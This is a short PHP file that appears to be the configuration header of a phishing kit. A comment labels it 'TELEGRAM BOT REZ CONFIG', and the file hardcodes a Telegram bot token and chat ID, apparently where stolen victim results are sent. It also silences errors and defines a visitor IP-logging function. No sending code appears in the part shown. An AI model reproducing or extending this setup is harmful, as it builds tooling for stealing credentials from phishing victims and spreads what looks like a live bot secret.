<?php 
session_start();
error_reporting(0);

// TELEGRAM BOT REZ CONFIG
define("TOKEN", '8483660786:AAERpu_GVo5qUVagmi6DLGWN81bWUoCsvW8');
define("CHATID", '-5003869761');


function get_client_ip() {
    $client  = @$_SERVER['HTTP_CLIENT_IP'];
    $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    $remote  = $_SERVER['REMOTE_ADDR'];
    if(filter_var($client, FILTER_VALIDATE_IP)) {
        $ip = $client;
    } else if(filter_var($forward, FILTER_VALIDATE_IP)) {
        $ip = $forward;
    } else {
        $ip = $remote;
    }
    if( $ip == '::1' ) {
        return '127.0.0.1';
    }
    return  $ip;
}

